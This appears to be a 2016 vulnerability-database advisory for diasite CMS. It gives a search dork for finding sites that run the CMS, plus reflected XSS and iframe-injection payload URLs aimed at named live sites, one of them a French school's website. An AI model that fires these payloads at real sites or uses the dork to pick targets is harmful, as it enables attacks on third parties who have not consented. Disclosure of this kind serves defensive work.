diasite CMS Reflected XSS & Iframe injection

2016.10.08

Implosion (FR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext: "Powered by diasite"

----------------------------------------------------------------------
[Description]
#Exploit title: diasite CMS Reflected XSS & Iframe injection
#Exploit author: Implosion
#Date: 07/10/2016
#Dorks: intext: "Powered by diasite"
#Website: www.diasite.fr
#Tested on: Firefox
----------------------------------------------------------------------
[Vulnerability][Reflected XSS]
http://www.diateam.net/Rechercher-14-0-0-0.html?q="><script>alert('XSS')</script>
----------------------------------------------------------------------
[Vulnerability][Iframe Injection]
http://www.diateam.net/Rechercher-14-0-0-0.html?q="><iframe src=https://cxsecurity.com>
----------------------------------------------------------------------
[Example]
http://www.lycee-kerichen.org/Rechercher-14-0-0-0.html?q=%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E
http://www.lycee-kerichen.org/Rechercher-14-0-0-0.html?q=%22%3E%3Ciframe%20src=https://cxsecurity.com%3E
----------------------------------------------------------------------
#Discovered By Implosion
#Thanks to: ÐØΨΠ–ŠËRVËR
----------------------------------------------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

diasite CMS Reflected XSS & Iframe injection

Dork: intext: "Powered by diasite"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.